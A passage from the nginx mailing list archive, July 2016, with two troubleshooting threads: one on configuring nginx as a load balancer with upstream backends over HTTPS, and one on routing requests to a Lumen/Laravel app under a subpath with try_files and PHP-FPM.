the URL for my site, which resolves to the IP of the load balancer, I get the default nginx page saying "nginx has been setup more configuration is required". I would expect nginx to forward my request through to the backend servers I have defined. And oddly enough, there is very little in the way of logging going on, to tell me why its failing. *My nginx.conf file is as follows:* user nginx; worker_processes 4; error_log /var/log/nginx/error.log warn; pid /var/run/nginx.pid; events { worker_connections 1024; } http { upstream myappliationsite.net { # Use ip hash for session persistance ip_hash; server backendappsite1.net; server backendappsite2.net; server backendappsite3.net; # The below only works on nginx plus #sticky route $route_cookie $route_uri; } include /etc/nginx/mime.types; default_type application/octet-stream; log_format main '$remote_addr - $remote_user [$time_local] "$request" ' '$status $body_bytes_sent "$http_referer" ' '"$http_user_agent" "$http_x_forwarded_for"'; access_log /var/log/nginx/access.log main; sendfile on; #tcp_nopush on; keepalive_timeout 60; gzip on; include /etc/nginx/conf.d/*.conf; } *My default.conf file is as follows:* server { listen 80; server_name myappliationsite.net; keepalive_timeout 70; #charset koi8-r; #access_log /var/log/nginx/log/host.access.log main; location / { root /usr/share/nginx/html; index index.html index.htm; } #error_page 404 /404.html; # redirect server error pages to the static page /50x.html # error_page 500 502 503 504 /50x.html; location = /50x.html { root /usr/share/nginx/html; } # proxy the PHP scripts to Apache listening on 127.0.0.1:80 # location ~ \.php$ { proxy_pass http://myappliationsite.net; proxy_set_header HOST myappliationsite.net; proxy_http_version 1.1; proxy_set_header Connection ""; } # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000 # #location ~ \.php$ { # root html; # fastcgi_pass 127.0.0.1:9000; # fastcgi_index index.php; # fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name; # include fastcgi_params; #} # deny access to .htaccess files, if Apache's document root # concurs with nginx's one # #location ~ /\.ht { # deny all; #} } server { listen 443 ssl; server_name myappliationsite.net; keepalive_timeout 70; ssl_certificate /certs/fd.crt; ssl_certificate_key /keys/lb.key; ssl_protocols TLSv1 TLSv1.1 TLSv1.2; ssl_ciphers HIGH:!aNULL:!MD5; #charset koi8-r; #access_log /var/log/nginx/log/host.access.log main; location / { root /usr/share/nginx/html; index index.html index.htm; } #error_page 404 /404.html; # redirect server error pages to the static page /50x.html # error_page 500 502 503 504 /50x.html; location = /50x.html { root /usr/share/nginx/html; } # proxy the PHP scripts to Apache listening on 127.0.0.1:80 # location ~ \.php$ { proxy_pass https://myappliationsite.net; proxy_set_header HOST myappliationsite.net; proxy_http_version 1.1; proxy_set_header Connection ""; } # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000 # #location ~ \.php$ { # root html; # fastcgi_pass 127.0.0.1:9000; # fastcgi_index index.php; # fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name; # include fastcgi_params; #} # deny access to .htaccess files, if Apache's document root # concurs with nginx's one # #location ~ /\.ht { # deny all; #} Can anyone help my get requests to go to the backend servers? Is there any other config or depenency apps needed that I may not have installed or running? Also is there a way to enable more advanced debug logging to give me a better idea whats going on? Thanks in advance! -------------- next part -------------- An HTML attachment was scrubbed... URL: From project722 at gmail.com Wed Jul 27 13:42:58 2016 From: project722 at gmail.com (Brian Pugh) Date: Wed, 27 Jul 2016 08:42:58 -0500 Subject: nginx not forwarding requests to backend servers. Message-ID: I am posting this again because a copy never appeared in my inbox. Please ignore if it was actually delivered to the group already. I am using nginx as a load balancer. However when I type in the URL for my site, which resolves to the IP of the load balancer, I get the default nginx page saying "nginx has been setup more configuration is required". I would expect nginx to forward my request through to the backend servers I have defined. And oddly enough, there is very little in the way of logging going on, to tell me why its failing. *My nginx.conf file is as follows:* user nginx; worker_processes 4; error_log /var/log/nginx/error.log warn; pid /var/run/nginx.pid; events { worker_connections 1024; } http { upstream myappliationsite.net { # Use ip hash for session persistance ip_hash; server backendappsite1.net; server backendappsite2.net; server backendappsite3.net; # The below only works on nginx plus #sticky route $route_cookie $route_uri; } include /etc/nginx/mime.types; default_type application/octet-stream; log_format main '$remote_addr - $remote_user [$time_local] "$request" ' '$status $body_bytes_sent "$http_referer" ' '"$http_user_agent" "$http_x_forwarded_for"'; access_log /var/log/nginx/access.log main; sendfile on; #tcp_nopush on; keepalive_timeout 60; gzip on; include /etc/nginx/conf.d/*.conf; } *My default.conf file is as follows:* server { listen 80; server_name myappliationsite.net; keepalive_timeout 70; #charset koi8-r; #access_log /var/log/nginx/log/host.access.log main; location / { root /usr/share/nginx/html; index index.html index.htm; } #error_page 404 /404.html; # redirect server error pages to the static page /50x.html # error_page 500 502 503 504 /50x.html; location = /50x.html { root /usr/share/nginx/html; } # proxy the PHP scripts to Apache listening on 127.0.0.1:80 # location ~ \.php$ { proxy_pass http://myappliationsite.net; proxy_set_header HOST myappliationsite.net; proxy_http_version 1.1; proxy_set_header Connection ""; } # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000 # #location ~ \.php$ { # root html; # fastcgi_pass 127.0.0.1:9000; # fastcgi_index index.php; # fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name; # include fastcgi_params; #} # deny access to .htaccess files, if Apache's document root # concurs with nginx's one # #location ~ /\.ht { # deny all; #} } server { listen 443 ssl; server_name myappliationsite.net; keepalive_timeout 70; ssl_certificate /certs/fd.crt; ssl_certificate_key /keys/lb.key; ssl_protocols TLSv1 TLSv1.1 TLSv1.2; ssl_ciphers HIGH:!aNULL:!MD5; #charset koi8-r; #access_log /var/log/nginx/log/host.access.log main; location / { root /usr/share/nginx/html; index index.html index.htm; } #error_page 404 /404.html; # redirect server error pages to the static page /50x.html # error_page 500 502 503 504 /50x.html; location = /50x.html { root /usr/share/nginx/html; } # proxy the PHP scripts to Apache listening on 127.0.0.1:80 # location ~ \.php$ { proxy_pass https://myappliationsite.net; proxy_set_header HOST myappliationsite.net; proxy_http_version 1.1; proxy_set_header Connection ""; } # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000 # #location ~ \.php$ { # root html; # fastcgi_pass 127.0.0.1:9000; # fastcgi_index index.php; # fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name; # include fastcgi_params; #} # deny access to .htaccess files, if Apache's document root # concurs with nginx's one # #location ~ /\.ht { # deny all; #} Can anyone help my get requests to go to the backend servers? Is there any other config or depenency apps needed that I may not have installed or running? Also is there a way to enable more advanced debug logging to give me a better idea whats going on? Thanks in advance! -------------- next part -------------- An HTML attachment was scrubbed... URL: From ben+nginx at list-subs.com Wed Jul 27 13:43:32 2016 From: ben+nginx at list-subs.com (Ben) Date: Wed, 27 Jul 2016 14:43:32 +0100 Subject: NGINX and Lumen (Laravel) 5 Message-ID: <29143b38-a29c-809a-b601-157667b8db37@list-subs.com> Hi, I'm having a frustrating time trying to get Lumen (a.k.a Laravel) working on my NGINX install. At the moment, the best I can get NGINX to give me is 405 errors. Which translates to the following error.log entry : stat() "/usr/share/path/to/my/lumen/public/directory//public/lumen/" failed (13: Permission denied), client: 192.168.121.10, server: my.example.com, request: "POST /lumen/ HTTP/1.1", host: "my.example.com" That error is in response to a simple cURL: curl -X POST --data-raw "demo=demo&example=example" https://my.example.com/lumen/ location /lumen { root /usr/share/path/to/my/lumen/public/directory//public; allow 192.168.0.0/16; deny all; expires 0; add_header Pragma "no-cache"; add_header Cache-Control "no-cache, no-store,must-revalidate"; #I have tried various "try_files..." #try_files $uri @lumen; try_files $uri $uri/ /index.php?$query_string; } location @lumen { fastcgi_param SCRIPT_FILENAME /usr/share/path/to/my/lumen/public/directory//public/index.php; fastcgi_param SCRIPT_NAME /lumen/; fastcgi_param PATH_INFO $fastcgi_path_info; fastcgi_pass unix:/var/run/php/php7.0-fpm.sock; fastcgi_param QUERY_STRING $args; } location ~ [^/]\.php(/|$) { fastcgi_split_path_info ^(.+?\.php)(/.*)$; if (!-f $document_root$fastcgi_script_name) { return 405; } fastcgi_pass unix:/var/run/php/php7.0-fpm.sock; fastcgi_index index.php; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; fastcgi_param PATH_INFO $fastcgi_path_info; include fastcgi_params; } From nginx-forum at forum.nginx.org Wed Jul 27 13:55:37 2016 From: nginx-forum at forum.nginx.org (crasyangel) Date: Wed, 27 Jul 2016 09:55:37 -0400 Subject: nginx not forwarding requests to backend servers. In-Reply-To: References: Message-ID: test ok with nginx 1.8.0?which nginx version you use? nginx must be confused by same domain name and upstream name, rename the upstream name! Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268548,268550#msg-268550 From project722 at gmail.com Wed Jul 27 14:07:28 2016 From: project722 at gmail.com (Brian Pugh) Date: Wed, 27 Jul 2016 09:07:28 -0500 Subject: nginx not forwarding requests to backend servers. In-Reply-To: References: Message-ID: nginx-1.10.1-1.el6.ngx.x86_64 on RHEL 6. What do you mean by rename the upstream? I thought if my backend applications are listening for requests on https://myapplicationsite.net then thats what the upstream server needs to be defined as in nginx? If I do rename and my backend server listen on https://myapplicationsite.net then how does nginx know to use that in the https header? What about the server_name decalaration and the info in proxy pass? Would I need to change that to in order to match the new upstream name? On Wed, Jul 27, 2016 at 8:55 AM, crasyangel wrote: > test ok with nginx 1.8.0?which nginx version you use? nginx must be > confused > by same domain name and upstream name, rename the upstream name! > > Posted at Nginx Forum: > https://forum.nginx.org/read.php?2,268548,268550#msg-268550 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at forum.nginx.org Wed Jul 27 14:30:31 2016 From: nginx-forum at forum.nginx.org (crasyangel) Date: Wed, 27 Jul 2016 10:30:31 -0400 Subject: nginx not forwarding requests to backend servers. In-Reply-To: References: Message-ID: don't get it. proxy_set_header host? upstream name only for lookup upstream, it has no business with any proxy headers Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268548,268552#msg-268552 From francis at daoine.org Wed Jul 27 14:48:17 2016 From: francis at daoine.org (Francis Daly) Date: Wed, 27 Jul 2016 15:48:17 +0100 Subject: nginx not forwarding requests to backend servers. In-Reply-To: References: Message-ID: <20160727144817.GA12280@daoine.org> On Wed, Jul 27, 2016 at 07:33:31AM -0500, Brian Pugh wrote: Hi there, > I am using nginx as a load balancer. However when I type in the URL for my > site, which resolves to the IP of the load balancer, I get the default > nginx page saying "nginx has been setup more configuration is required". I > would expect nginx to forward my request through to the backend servers I > have defined. What request do you make of nginx? Which of your defined location{} blocks does it match: location / { location = /50x.html { location ~ \.php$ { > And oddly enough, there is very little in the way of logging > going on, to tell me why its failing. You wrote that it is returning some content, presumably with a http 200. That suggests that it is not failing to do what you told it to do. It cannot guess what you want it to do. > Can anyone help my get requests to go to the backend servers? Is there Try a request that ends with ".php" ? Use "curl -v" and copy-paste the output, if it is not what you expect. > any other config or depenency apps needed that I may not have installed or > running? Also is there a way to enable more advanced debug logging to give > me a better idea whats going on? There is the "debug log", which is "extra stuff written to the error log": http://nginx.org/en/docs/debugging_log.html Cheers, f -- Francis Daly francis at daoine.org From r at roze.lv Wed Jul 27 14:50:05 2016 From: r at roze.lv (Reinis Rozitis) Date: Wed, 27 Jul 2016 17:50:05 +0300 Subject: NGINX and Lumen (Laravel) 5 In-Reply-To: <29143b38-a29c-809a-b601-157667b8db37@list-subs.com> References: <29143b38-a29c-809a-b601-157667b8db37@list-subs.com> Message-ID: <4A4C61D6138D47519CACC5491D364F22@MezhRoze> > Which translates to the following error.log entry : > > stat() > "/usr/share/path/to/my/lumen/public/directory//public/lumen/" > failed (13: Permission denied), client: 192.168.121.10, server: > my.example.com, request: "POST /lumen/ HTTP/1.1", host: "my.example.com" Does the nginx user have read permissions on that path? rr From francis at daoine.org Wed Jul 27 15:07:02 2016 From: francis at daoine.org (Francis Daly) Date: Wed, 27 Jul 2016 16:07:02 +0100 Subject: NGINX and Lumen (Laravel) 5 In-Reply-To: <29143b38-a29c-809a-b601-157667b8db37@list-subs.com> References: <29143b38-a29c-809a-b601-157667b8db37@list-subs.com> Message-ID: <20160727150702.GB12280@daoine.org> On Wed, Jul 27, 2016 at 02:43:32PM +0100, Ben wrote: Hi there, > At the moment, the best I can get NGINX to give me is 405 errors. 405 is usually "Method Not Allowed", such as when you try to POST to a file. But in this case, you do your own "return 405". > Which translates to the following error.log entry : > > stat() > "/usr/share/path/to/my/lumen/public/directory//public/lumen/" > failed (13: Permission denied), client: 192.168.121.10, server: > my.example.com, request: "POST /lumen/ HTTP/1.1", host: > "my.example.com" What happens if the nginx user does ls -l "/usr/share/path/to/my/lumen/public/directory//public/lumen/" ? And: does that error.log entry only appear once? I would expect it twice per request, given your config. > location /lumen { > root /usr/share/path/to/my/lumen/public/directory//public; > try_files $uri $uri/ /index.php?$query_string; So, $uri fails (permission denied), $uri/ fails (permission denied), so now there is an internal rewrite to /index.php. > location ~ [^/]\.php(/|$) { > fastcgi_split_path_info ^(.+?\.php)(/.*)$; > if (!-f $document_root$fastcgi_script_name) { > return 405; > } And unless /usr/local/nginx/html/index.php exists, that "return 405" will happen. That's why what you have fails today. Does searching for something like "site:laravel.com nginx" or "site:nginx.com laravel" or "site:nginx.org laravel" return useful docs? Cheers, f -- Francis Daly francis at daoine.org From project722 at gmail.com Wed Jul 27 15:24:50 2016 From: project722 at gmail.com (Brian Pugh) Date: Wed, 27 Jul 2016 10:24:50 -0500 Subject: nginx not forwarding requests to backend servers. In-Reply-To: <20160727144817.GA12280@daoine.org> References: <20160727144817.GA12280@daoine.org> Message-ID: What request do you make of nginx? Requests come into nginx as https://myapplicationsite.net" On the actual backend server, that request is then redirected to: https://myapplicationsite.net//app/service/login?url=%2Fl That brings up the login page on the backend server. Which of your defined location{} blocks does it match: location / { location = /50x.html { location ~ \.php$ { This is another part I am not sure how to setup. Since I am not passing any php scripts I would have to say it matches the location /{} block. So I have now modified that section of code to read: location / { #root /usr/share/nginx/html; root /app/service/login?url=%2Fl; index index.html index.htm; } And now, I get a different behavior once these changes are made. It now fails with a 404 not found and in the logs I see: 2016/07/27 10:06:46 [error] 26994#26994: *3 "/app/service/login?url=%2Fl/index.html" is not found (2: No such file or directory), client: 192.168.254.202, server: myapplicationsite.net, request: "GET / HTTP/1.1", host: "myapplicationsite.net" It cannot guess what you want it to do. Right, I get that. I am a newb at nginx so I am looking for guidance on how to set all this up, which is why I posted my complete configs and described exactly what I wanted to accomplish. So, to recap, I have 3 backend servers that can accept connections using the following hostnames: backendappsite1.net backendappsite2.net backendappsite3.net The hostname that maps to nginx is myapplicationsite.net. What I want to happen is anytime a request for myapplicationsite.net hits nginx, it get sent to one of the servers above in a round robin fashion. Can anyone give me an example config of what it would look like in both nginx.conf and default.conf using the names/info I have provided? On Wed, Jul 27, 2016 at 9:48 AM, Francis Daly wrote: > On Wed, Jul 27, 2016 at 07:33:31AM -0500, Brian Pugh wrote: > > Hi there, > > > I am using nginx as a load balancer. However when I type in the URL for > my > > site, which resolves to the IP of the load balancer, I get the default > > nginx page saying "nginx has been setup more configuration is required". > I > > would expect nginx to forward my request through to the backend servers I > > have defined. > > What request do you make of nginx? > > Which of your defined location{} blocks does it match: > > location / { > location = /50x.html { > location ~ \.php$ { > > > And oddly enough, there is very little in the way of logging > > going on, to tell me why its failing. > > You wrote that it is returning some content, presumably with a http > 200. That suggests that it is not failing to do what you told it to do. > > It cannot guess what you want it to do. > > > Can anyone help my get requests to go to the backend servers? Is > there > > Try a request that ends with ".php" ? > > Use "curl -v" and copy-paste the output, if it is not what you expect. > > > any other config or depenency apps needed that I may not have installed > or > > running? Also is there a way to enable more advanced debug logging to > give > > me a better idea whats going on? > > There is the "debug log", which is "extra stuff written to the error log": > > http://nginx.org/en/docs/debugging_log.html > > Cheers, > > f > -- > Francis Daly francis at daoine.org > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From r at roze.lv Wed Jul 27 15:42:11 2016 From: r at roze.lv (Reinis Rozitis) Date: Wed, 27 Jul 2016 18:42:11 +0300 Subject: nginx not forwarding requests to backend servers. In-Reply-To: References: <20160727144817.GA12280@daoine.org> Message-ID: > Can anyone give me an example config of what it would look like in both > nginx.conf and default.conf using the names/info I have provided? It seems you have taken the default configuration example but if you use nginx as a balancer without serving any .php (or other) files you actually don't need those *.php etc locations - a single location / {} will do the job (means all requests go to backends). For example: http { upstream myappliationsite.net { ip_hash; server backendappsite1.net; server backendappsite2.net; server backendappsite3.net; } server { listen 80; listen 443 ssl; server_name myappliationsite.net; location / { proxy_pass http://myappliationsite.net; proxy_set_header HOST myappliationsite.net; } } From project722 at gmail.com Wed Jul 27 16:07:55 2016 From: project722 at gmail.com (Brian Pugh) Date: Wed, 27 Jul 2016 11:07:55 -0500 Subject: nginx not forwarding requests to backend servers. In-Reply-To: References: <20160727144817.GA12280@daoine.org> Message-ID: Ok. This looks like progress. However it still fails. Here is my config as it stands now. in nginx.conf: http { upstream myappliationsite.net { ip_hash; server backendappsite1.net; server backendappsite2.net; server backendappsite3.net; } In default.conf: server { listen 443 ssl; server_name myapplicationsite.net; keepalive_timeout 70; ssl_certificate /appssl/fd.crt; ssl_certificate_key /appssl/lb.key; ssl_protocols TLSv1 TLSv1.1 TLSv1.2; ssl_ciphers HIGH:!aNULL:!MD5; location / { proxy_pass http://myapplicationsite.net; proxy_set_header HOST myapplicationsite.net; } } And here is the errors I get: On the web page: 502 bad gateway. >From the logs: HTTP/1.1", upstream: *"http://192.168.155.120:80 */", host: "myapplicationsite.net" 2016/07/27 10:54:05 [warn] 27491#27491: *3 upstream server temporarily disabled while connecting to upstream, client: 192.168.254.202, server: myapplicationsite.net, request: "GET / HTTP/1.1", upstream: "*http://192.168.155.120:80 */", host: "myapplicationsite.net" Why is it trying to connect to my servers over port 80? I need to pass it over on 443. How can I accomplish this? Even if I change the proxy pass to https in the logs it still trys On Wed, Jul 27, 2016 at 10:42 AM, Reinis Rozitis wrote: > Can anyone give me an example config of what it would look like in both >> nginx.conf and default.conf using the names/info I have provided? >> > > It seems you have taken the default configuration example but if you use > nginx as a balancer without serving any .php (or other) files you actually > don't need those *.php etc locations - a single location / {} will do the > job (means all requests go to backends). > > For example: > > > http { > upstream myappliationsite.net { > ip_hash; > server backendappsite1.net; > server backendappsite2.net; > server backendappsite3.net; > } > > server { > listen 80; > listen 443 ssl; > > server_name myappliationsite.net; > > location / { > proxy_pass http://myappliationsite.net; > proxy_set_header HOST myappliationsite.net; > } > } > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at forum.nginx.org Wed Jul 27 16:17:38 2016 From: nginx-forum at forum.nginx.org (crasyangel) Date: Wed, 27 Jul 2016 12:17:38 -0400 Subject: nginx not forwarding requests to backend servers. In-Reply-To: References: Message-ID: <9d3e9c761ff070d07a069b332ced40c2.NginxMailingListEnglish@forum.nginx.org> u.default_port = 80; in ngx_http_upstream_server add a new upstream upstream ssl_myappliationsite.net { ip_hash; server backendappsite1.net:443; server backendappsite2.net:443; server backendappsite3.net:443; } server { listen 443 ssl; server_name myapplicationsite.net; keepalive_timeout 70; ssl_certificate /appssl/fd.crt; ssl_certificate_key /appssl/lb.key; ssl_protocols TLSv1 TLSv1.1 TLSv1.2; ssl_ciphers HIGH:!aNULL:!MD5; location / { proxy_pass http://ssl_myappliationsite.net; proxy_set_header HOST myapplicationsite.net; } } Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268547,268559#msg-268559 From r at roze.lv Wed Jul 27 16:18:45 2016 From: r at roze.lv (Reinis Rozitis) Date: Wed, 27 Jul 2016 19:18:45 +0300 Subject: nginx not forwarding requests to backend servers. In-Reply-To: References: <20160727144817.GA12280@daoine.org> Message-ID: <240A20A4901A42C99CE03A88864C1A0D@MezhRoze> > : "myapplicationsite.net" > 2016/07/27 10:54:05 [warn] 27491#27491: *3 upstream server temporarily > disabled while connecting to upstream, client: 192.168.254.202, server: > myapplicationsite.net, request: "GET / HTTP/1.1", upstream: > "http://192.168.155.120:80/", host: "myapplicationsite.net" > Why is it trying to connect to my servers over port 80? I need to pass it > over on 443. How can I accomplish this? Even if I change the proxy pass to > https in the logs it still trys As you don't specify the port in upstream {} block nginx uses the default which is 80 ( http://nginx.org/en/docs/http/ngx_http_upstream_module.html#server ) Also for secure backend connection you should enable proxy_ssl. Reading https://www.nginx.com/resources/admin-guide/nginx-tcp-ssl-upstreams/ should probably be a good start. rr On Wed, Jul 27, 2016 at 10:42 AM, Reinis Rozitis wrote: Can anyone give me an example config of what it would look like in both nginx.conf and default.conf using the names/info I have provided? It seems you have taken the default configuration example but if you use nginx as a balancer without serving any .php (or other) files you actually don't need those *.php etc locations - a single location / {} will do the job (means all requests go to backends). For example: http { upstream myappliationsite.net { ip_hash; server backendappsite1.net; server backendappsite2.net; server backendappsite3.net; } server { listen 80; listen 443 ssl; server_name myappliationsite.net; location / { proxy_pass http://myappliationsite.net; proxy_set_header HOST myappliationsite.net; } } _______________________________________________ nginx mailing list nginx at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx _______________________________________________ nginx mailing list nginx at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx From ben+nginx at list-subs.com Wed Jul 27 16:22:29 2016 From: ben+nginx at list-subs.com (Ben) Date: Wed, 27 Jul 2016 17:22:29 +0100 Subject: NGINX and Lumen (Laravel) 5 In-Reply-To: <4A4C61D6138D47519CACC5491D364F22@MezhRoze> References: <29143b38-a29c-809a-b601-157667b8db37@list-subs.com> <4A4C61D6138D47519CACC5491D364F22@MezhRoze> Message-ID: <86be9233-94ed-0db5-9039-a8400ae5fc02@list-subs.com> On 27/07/2016 15:50, Reinis Rozitis wrote: >> Which translates to the following error.log entry : >> >> stat() >> "/usr/share/path/to/my/lumen/public/directory//public/lumen/" >> failed (13: Permission denied), client: 192.168.121.10, server: >> my.example.com, request: "POST /lumen/ HTTP/1.1", host: "my.example.com" > > Does the nginx user have read permissions on that path? > The main problem is that path does not exist. It exists all the way up to /public/, but NGINX seems to be adding the /lumen/ bit, which I guess is because of "location /lumen", but I'm not too sure how to go about telling it not to add the the location path as a suffix. From ben+nginx at list-subs.com Wed Jul 27 16:27:10 2016 From: ben+nginx at list-subs.com (Ben) Date: Wed, 27 Jul 2016 17:27:10 +0100 Subject: NGINX and Lumen (Laravel) 5 In-Reply-To: <20160727150702.GB12280@daoine.org> References: <29143b38-a29c-809a-b601-157667b8db37@list-subs.com> <20160727150702.GB12280@daoine.org> Message-ID: <1dc8663f-0c12-0166-6208-6e045a62fe07@list-subs.com> On 27/07/2016 16:07, Francis Daly wrote: > > 405 is usually "Method Not Allowed", such as when you try to POST to a file. > > But in this case, you do your own "return 405". POST was just an example, the config doesn't work with GET or anything else. > What happens if the nginx user does > > ls -l "/usr/share/path/to/my/lumen/public/directory//public/lumen/" Doesn't exist. "/usr/share/path/to/my/lumen/public/directory//public" exists, but the /lumen/ suffix doesn't. > > ? And: does that error.log entry only appear once? I would expect it > twice per request, given your config. Only appears once. > >> location /lumen { >> root /usr/share/path/to/my/lumen/public/directory//public; >> try_files $uri $uri/ /index.php?$query_string; > > So, $uri fails (permission denied), $uri/ fails (permission denied), > so now there is an internal rewrite to /index.php. > >> location ~ [^/]\.php(/|$) { >> fastcgi_split_path_info ^(.+?\.php)(/.*)$; >> if (!-f $document_root$fastcgi_script_name) { >> return 405; >> } > > And unless /usr/local/nginx/html/index.php exists, that "return 405" > will happen. "/usr/share/path/to/my/lumen/public/directory//public/index.php" exists "/usr/share/path/to/my/lumen/public/directory//public/lumen/index.php" does not, and that seems to be where NGINX is insistent on going. . > > Does searching for something like "site:laravel.com nginx" or > "site:nginx.com laravel" or "site:nginx.org laravel" return useful docs? > Admittely I didn't try "site:" but I did try "nginx laravel", tried a few ideas from various stackexchange discussions but nothing much seemed to fix it. Hence I thought I'd drop by here incase anyone had experienced it before and could save me spending another few hours looking for the proverbial needle in a haystack (since I bet it will end up being a stupidly small NGINX config file change I need to make !). From r at roze.lv Wed Jul 27 16:39:43 2016 From: r at roze.lv (Reinis Rozitis) Date: Wed, 27 Jul 2016 19:39:43 +0300 Subject: NGINX and Lumen (Laravel) 5 In-Reply-To: <86be9233-94ed-0db5-9039-a8400ae5fc02@list-subs.com> References: <29143b38-a29c-809a-b601-157667b8db37@list-subs.com> <4A4C61D6138D47519CACC5491D364F22@MezhRoze> <86be9233-94ed-0db5-9039-a8400ae5fc02@list-subs.com> Message-ID: <40BDE3D7C3104BC39A3139766ECF2C6F@MezhRoze> > It exists all the way up to /public/, but NGINX seems to be adding the > /lumen/ bit, which I guess is because of "location /lumen", but I'm not > too sure how to go about telling it not to add the the location path as a > suffix. You could try to use the alias instead of root then ( http://nginx.org/en/docs/http/ngx_http_core_module.html#alias ). In my mind though you're making it complicated. In my experience all the Laravels work just simply by doing: server { root /path/laravel/public; location / { try_files $uri $uri/ /index.php?$query_string; } location ~ \.php$ { fastcgi_pass unix:/var/run/php/php7.0-fpm.sock; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; fastcgi_index index.php; include fastcgi_params; } } All the non-existing files (it helps to define a seperate location for static files though) and virtual paths are passed to the Laravel's /index.php "router" and it knows what to do with it without any extra mumbojumbo on nginx side. rr From project722 at gmail.com Wed Jul 27 17:07:34 2016 From: project722 at gmail.com (Brian Pugh) Date: Wed, 27 Jul 2016 12:07:34 -0500 Subject: nginx not forwarding requests to backend servers. In-Reply-To: <240A20A4901A42C99CE03A88864C1A0D@MezhRoze> References: <20160727144817.GA12280@daoine.org> <240A20A4901A42C99CE03A88864C1A0D@MezhRoze> Message-ID: Still not working. Logs show: 2016/07/27 11:59:35 [warn] 28038#28038: *3 upstream server temporarily disabled while reading response header from upstream, client: 192.168.254.202, server: myapplicationsite.net, request: "GET / HTTP/1.1", upstream: *"http://192.168.155.120:443/ "*, host: "myapplicationsite.net" Why does it show http:// with :443 here? Here is my updated config: http { upstream mysiteapplication.net { # Use ip hash for session persistance ip_hash; server backendappsite1:80; server backendsiteapp2:80; server backendsiteapp3:80; # The below only works on nginx plus #sticky route $route_cookie $route_uri; } upstream ssl_mysiteapplication.net.net { # Use ip hash for session persistance ip_hash; server backendappsite1:443; server backendappsite2:443; server backendappsite3:443; # The below only works on nginx plus #sticky route $route_cookie $route_uri; } Crasyangel - I am not sure where I am supposed to put this: u.default_port = 80; in ngx_http_upstream_server I tried it inside my http upstream block and got a message about unknown directive "u.default_port" Here is my updated default.conf: server { listen 443 ssl; server_name myapplicationsite.net; keepalive_timeout 70; ssl_certificate /appssl/fd.crt; ssl_certificate_key /appssl/lb.key; ssl_protocols TLSv1 TLSv1.1 TLSv1.2; ssl_ciphers HIGH:!aNULL:!MD5; location / { proxy_pass http://ssl_test-resolve.cspire.net; proxy_set_header HOST test-resolve.cspire.net; } } On Wed, Jul 27, 2016 at 11:18 AM, Reinis Rozitis wrote: > : "myapplicationsite.net" >> 2016/07/27 10:54:05 [warn] 27491#27491: *3 upstream server temporarily >> disabled while connecting to upstream, client: 192.168.254.202, server: >> myapplicationsite.net, request: "GET / HTTP/1.1", upstream: " >> http://192.168.155.120:80/", host: "myapplicationsite.net" >> > > Why is it trying to connect to my servers over port 80? I need to pass it >> over on 443. How can I accomplish this? Even if I change the proxy pass to >> https in the logs it still trys >> > > As you don't specify the port in upstream {} block nginx uses the default > which is 80 ( > http://nginx.org/en/docs/http/ngx_http_upstream_module.html#server ) > > Also for secure backend connection you should enable proxy_ssl. > > Reading > https://www.nginx.com/resources/admin-guide/nginx-tcp-ssl-upstreams/ > should probably be a good start. > > > rr > > > > > > On Wed, Jul 27, 2016 at 10:42 AM, Reinis Rozitis wrote: > Can anyone give me an example config of what it would look like in both > nginx.conf and default.conf using the names/info I have provided? > > It seems you have taken the default configuration example but if you use > nginx as a balancer without serving any .php (or other) files you actually > don't need those *.php etc locations - a single location / {} will do the > job (means all requests go to backends). > > For example: > > > http { > upstream myappliationsite.net { > ip_hash; > server backendappsite1.net; > server backendappsite2.net; > server backendappsite3.net; > } > > server { > listen 80; > listen 443 ssl; > > server_name myappliationsite.net; > > location / { > proxy_pass http://myappliationsite.net; > proxy_set_header HOST myappliationsite.net; > } > } > > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > > > > > > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From ben+nginx at list-subs.com Wed Jul 27 17:16:20 2016 From: ben+nginx at list-subs.com (Ben) Date: Wed, 27 Jul 2016 18:16:20 +0100 Subject: NGINX and Lumen (Laravel) 5 In-Reply-To: <40BDE3D7C3104BC39A3139766ECF2C6F@MezhRoze> References: <29143b38-a29c-809a-b601-157667b8db37@list-subs.com> <4A4C61D6138D47519CACC5491D364F22@MezhRoze> <86be9233-94ed-0db5-9039-a8400ae5fc02@list-subs.com> <40BDE3D7C3104BC39A3139766ECF2C6F@MezhRoze> Message-ID: <34a6d1b4-14be-5f65-989d-c0c070148166@list-subs.com> On 27/07/2016 17:39, Reinis Rozitis wrote: > > You could try to use the alias instead of root then ( > http://nginx.org/en/docs/http/ngx_http_core_module.html#alias ). I will take a look at that link. Thank you. > > In my mind though you're making it complicated. Perhaps I should clarify context why it not I might not be making things "complicated" as you think. This NGINX config relates to an SSL dev-site. So I've got a buch of things I want to use the SSL site for, and laravel/lumen is just one of them, hence the desire (or rather need !) to have it as a path rather than just make laravel/lumen "the" site. > > In my experience all the Laravels work just simply by doing: > > server { > > root /path/laravel/public; > > location / { > try_files $uri $uri/ /index.php?$query_string; > } > > location ~ \.php$ { > fastcgi_pass 